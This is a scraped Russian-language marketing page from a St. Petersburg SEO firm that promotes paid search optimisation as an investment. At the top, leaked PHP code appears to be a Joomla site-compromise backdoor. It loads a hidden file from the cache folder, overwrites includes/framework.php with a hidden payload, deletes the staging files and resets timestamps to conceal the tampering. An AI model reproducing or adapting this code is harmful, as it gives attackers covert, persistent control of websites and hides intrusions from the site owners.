$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } А сколько Вы тратите в месяц на привлечение клиентов? - Продвижение сайтов Петербург
Главная
 

А сколько Вы тратите в месяц на привлечение клиентов?

 

поисковая оптимизация сайтов дает клиентов

 

По неписанным законам экономики для того, что бы предприятие жило и развивалось нормально, вложения в рекламу должны составлять примерно 15% от прибыли.
В период кризиса многие предприятия увеличили эту цифру до 40-60%. И это один из основных факторов, который помог им выжить и остаться на плаву.

Деньги на оптимизацию сайта - это надежное вложение средств.
Есть много пока ещё привычных рекламных расходов, где большие деньги выбрасываются на ветер. Вложение в продвижение сайта - это инвестиции. Инвестиции в покупку клиентов.

А Вы уже купили себе клиентов? Тарифы поисковой оптимизации

 





© 2018 Продвижение сайтов Петербург.
Все права защищены. Перепечатка только с письменного согласия авторов.
 


Голосование

Что Вы ждете от продвижения Вашего сайта?